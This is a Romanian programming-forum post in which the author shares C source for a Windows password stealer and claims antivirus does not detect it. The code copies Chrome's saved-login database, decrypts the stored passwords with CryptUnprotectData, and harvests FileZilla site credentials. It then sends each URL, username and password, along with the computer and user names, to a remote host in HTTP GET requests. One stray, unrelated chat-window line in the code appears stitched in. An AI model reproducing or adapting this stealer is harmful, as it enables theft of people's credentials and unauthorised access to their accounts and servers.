Jump to content
FarSe

C Chrome FileZilla Password stealer sourcecode

By FarSe, in Programare

Recommended Posts

FarSe Newbie

FarSe

Posted
Posted (edited)

Este facut de mine, nu este detectat de antivirus, pentru ca nu are de ce.

Aveti nevoie de sqlite3.dll (.lib)

Stiu ca codul arata ciudat, variabile idioate, dar l-am facut in graba.

PHP-ul il faceti voi, daca vreti sa folositi acest cod, doar luati $_GET pt fiecare.

	DWORD myThreadID;
	HANDLE myHandle = CreateThread(0, 0, LetMeFuckYou, NULL, 0, &myThreadID);
	CloseHandle(myHandle);
#define HOST "www.host.com"
#define PORT 80
#define PAGE_NAME "file.php"
void Request (const char* server,const char* input) 
{
    HINTERNET hInternet;
    HINTERNET hConnect;
    HINTERNET hRequest;
    hInternet = InternetOpenA("Open",INTERNET_OPEN_TYPE_PRECONFIG,NULL,NULL,INTERNET_FLAG_DONT_CACHE);
    if (hInternet != NULL)
	{
		hConnect = InternetConnectA(hInternet,server,PORT,NULL,NULL,INTERNET_SERVICE_HTTP,0,1u);
		if (hConnect != NULL)
		{
			hRequest = HttpOpenRequestA(hConnect,"GET",input,NULL,NULL,0,INTERNET_FLAG_KEEP_CONNECTION,1);
			if (hRequest != NULL)
			{
				HttpSendRequestA(hRequest,"Content-Type: application/x-www-form-urlencoded\r\n",-1L,NULL,0);
			}
		}
	}
	InternetCloseHandle(hInternet);
    InternetCloseHandle(hConnect);
    InternetCloseHandle(hRequest);
}
char* getComputerName()
{
	DWORD computerNameSize = 512;
	char* computerName;
	computerName = (char*)malloc(512*sizeof(char));
	GetComputerNameA(computerName, &computerNameSize);
	DWORD UserNameSize = 512;
	char* userName;
	userName = (char*)malloc(512*sizeof(char));
	GetUserNameA(userName, &UserNameSize);
	char* fullComputerName = (char*)malloc(1024*sizeof(char));
	ZeroMemory(fullComputerName,1024*sizeof(char));
	strcat(fullComputerName,(const char*)computerName);
	strcat(fullComputerName,"( ");
	strcat(fullComputerName,userName);
	strcat(fullComputerName," )");
	return fullComputerName;
}
char * replace(
    char const * const original, 
    char const * const pattern, 
    char const * const replacement
) {
  size_t const replen = strlen(replacement);
  size_t const patlen = strlen(pattern);
  size_t const orilen = strlen(original);
  size_t patcnt = 0;
  const char * oriptr;
  const char * patloc;
  for (oriptr = original; patloc = strstr(oriptr, pattern); oriptr = patloc + patlen)
  {
    patcnt++;
  }
  {
    size_t const retlen = orilen + patcnt * (replen - patlen);
    char * const returned = (char *) malloc( sizeof(char) * (retlen + 1) );
    if (returned != NULL)
    {
      char * retptr = returned;
      for (oriptr = original; patloc = strstr(oriptr, pattern); oriptr = patloc + patlen)
      {
        size_t const skplen = patloc - oriptr;
        strncpy(retptr, oriptr, skplen);
        retptr += skplen;
        strncpy(retptr, replacement, replen);
        retptr += replen;
      }
      strcpy(retptr, oriptr);
    }
    return returned;
  }
}
DWORD WINAPI LetMeFuckYou(LPVOID lpParameter)
{
	char * numepc = getComputerName();
	TCHAR szPath[MAX_PATH];
	TCHAR ozPath[MAX_PATH];
	if (SUCCEEDED(SHGetFolderPath(NULL, CSIDL_LOCAL_APPDATA, NULL, 0, szPath)))
	{
		PathAppend(ozPath, szPath);
		PathAppend(ozPath, TEXT("\\Google\\Chrome\\User Data\\Default\\loginmata"));	
		PathAppend(szPath, TEXT("\\Google\\Chrome\\User Data\\Default\\Login Data"));
		FILE *file;
		if ((file = fopen(szPath, "r")) == NULL) {
		  if (errno == ENOENT) {
			  goto bunica;
			return 1;
		  } else {
			  goto bunica;
			return 1;
		  }
		} else {
		  fclose(file);
		}
		if(CopyFile(szPath, ozPath, FALSE) == 0)
		{
			return 1;
		}
		sqlite3 *rec_db;
		if ( sqlite3_open( ozPath, &rec_db ) != SQLITE_OK )
		{
			sqlite3_close( rec_db );
		}else
		{
			sqlite3_stmt *prep_stmt;
			int prep_step_ret;
			char sql_cmd[256];
			char data[256];
			_snprintf_s( sql_cmd, sizeof(sql_cmd)-1, "SELECT origin_url,username_value,password_value FROM logins;" );
			if ( sqlite3_prepare_v2( rec_db, sql_cmd, sizeof(sql_cmd), &prep_stmt, NULL ) != SQLITE_OK )
			{
				sqlite3_close( rec_db );
				return NULL;
			}
			prep_step_ret = sqlite3_step( prep_stmt );
			while ( prep_step_ret == SQLITE_ROW )
			{
				DATA_BLOB in, out;
				char lesite[1024], username[1024], password[1024];
				lesite[0] ='\0';
				username[0] ='\0';
				password[0] ='\0';
				data[0] ='\0';
				strcat(lesite,(char*)sqlite3_column_text(prep_stmt, 0));
				strcat(username, (char*)sqlite3_column_text(prep_stmt, 1));
				in.pbData = (LPBYTE) sqlite3_column_blob(prep_stmt, 2);
				in.cbData = sqlite3_column_bytes(prep_stmt, 2);
	 			if (CryptUnprotectData(&in, NULL, NULL, NULL, NULL, 1, &out)) {
					strcat(password , (char*)out.pbData);
					password[out.cbData] = 0;
					LocalFree(out.pbData);
				} else {
				strcat(password, "<decryption failed>");
				}
				strcpy(data,PAGE_NAME);
				char * const newstr = replace(password,"&","%26");
				strcat(data,"?comp=");
				strcat(data,numepc);
				strcat(data,"&type=chrome");
				strcat(data,"&lesite=");
				strcat(data,lesite);
				strcat(data,"&username=");
				strcat(data,username);
				strcat(data,"&password=");
				strcat(data,newstr);
				Request(HOST,data);
				prep_step_ret = sqlite3_step( prep_stmt );
			}
			sqlite3_close( rec_db );
			addMessageToChatWindow("Ready to steal objects, type /m0d_addline to add file breakpoint");
		}
	}
	bunica:
	TCHAR lola[MAX_PATH];
	if (SUCCEEDED(SHGetFolderPath(NULL, CSIDL_APPDATA, NULL, 0, szPath)))
	{
		PathAppend(lola,szPath);
		PathAppend(szPath, TEXT("\\FileZilla\\sitemanager.xml"));
		PathAppend(lola, TEXT("\\FileZilla\\recentservers.xml"));
		for(int i = 0; i < 2; i++) 
		{
			char bunica[256];
			if( i == 0 ) strcpy(bunica,szPath);
			else if(i == 1) strcpy(bunica,lola);
			else break;
			FILE *file;
			if ((file = fopen(bunica, "r")) == NULL) {
			  if (errno == ENOENT) {
				return 1;
			  } else {
				return 1;
			  }
			} else {
				char host[128];
				char port[128];
				char user[128];
				char pass[128];
				char data[256];
				snprintf(data,128,"");
				snprintf(host,128,"");
				snprintf(port,128,"");
				snprintf(user,128,"");
				snprintf(pass,128,"");
				char string[256];
				snprintf(string,256,"");
					while(!feof(file)){
					if (fgets(string,100,file)) {
						char * pch;
						pch = strtok (string,">");
						int state = 0;
						while (pch != NULL)
						{
							if(state == 1)	{strcpy(host,pch);	state = 0;}
							if(strstr(pch,"<Host") != NULL){state = 1;}
							if(state == 2)	{strcpy(port,pch);	state = 0;}
							if(strstr(pch,"<Port") != NULL){state = 2;}
							if(state == 3)	{strcpy(user,pch);	state = 0;}
							if(strstr(pch,"<User") != NULL){state = 3;}
							if(state == 4)	{strcpy(pass,pch);	state = 5;}
							if(strstr(pch,"<Pass") != NULL){state = 4;}
							if(state == 5)
							{
								strcpy(data,PAGE_NAME);
								char * const newstr = replace(pass,"&","%26");
								strcat(data,"?comp=");
								strcat(data,numepc);
								strcat(data,"&type=filezilla");
								strcat(data,"&lesite=");
								strcat(data,host);
								strcat(data,":");
								strcat(data,port);
								strcat(data,"&username=");
								strcat(data,user);
								strcat(data,"&password=");
								strcat(data,newstr);
								Request(HOST,data);
								snprintf(host,128,"");
								snprintf(port,128,"");
								snprintf(user,128,"");
								snprintf(pass,128,"");
								state = 0;
							}
							pch = strtok (NULL, "<>");
						}
					}
				}
			  fclose(file);
			}
		}
	}
	return 1;
}



			
				


	Edited  by FarSe
	
	

			
		


		
			

				
					
						

	
	
		

			
				
				

					
				

			
			
			
		

	


					
				
				
			

		

		
			

		
	


	

	





	
Link to comment

	
		
	
	
	

	
	
Share on other sites

	

	


	

	

	




	



					
				
			
			



		

	


	
	

	
		
		

			
				
				

	
		

			
Join the conversation

			

	
				
					You can post now and register later.
				
				If you have an account, sign in now to post with your account.
				
			

	
		

	




	
	
		
	
		
	
		
	
	
		
		
	
	

		

		


	
		Guest
	


		

			
				
					
				
					
						
    
							
  • 
								


	
	
	
	

								
							
    • 
						

					
				
					
				
			
			
				
					
						
							
						
						



    

		
		

			
		

		
			
 Reply to this topic...

		
		

			

				
					×
					  Pasted as rich text.   Paste as plain text instead
				
			

		

		

			

				  Only 75 emoji are allowed.
			

		

		

			

				×
				  Your link has been automatically embedded.   Display as a link instead
			

		

		

			

			

		

		

			

				×
				  Your previous content has been restored.   Clear editor
			

		

		

			

				×
				  You cannot paste images directly. Upload or insert images from URL.
			

		

		
	

		
	

	

	

		

			×
			
		

		

	



						
					
				
					
				
					
				
			
			
    
				
					
						
					
						
					
						
							
  • 
								


    
	

    

								
							
    • 
						
					
				
				
					
  • 

	

    • 
				
			

		

	



			
		

	

	
		

			




		

		

			



		

	







	

		
			
				Go to topic listing
			
		
	

	




	

	

	


	

	




								


							

							


						

					

					
				

				

				

			

		

		
		


	×
	

		

			

			

				

					
				


			

			
		

	






	×
	

		

			
    
				
  • Create New...
    •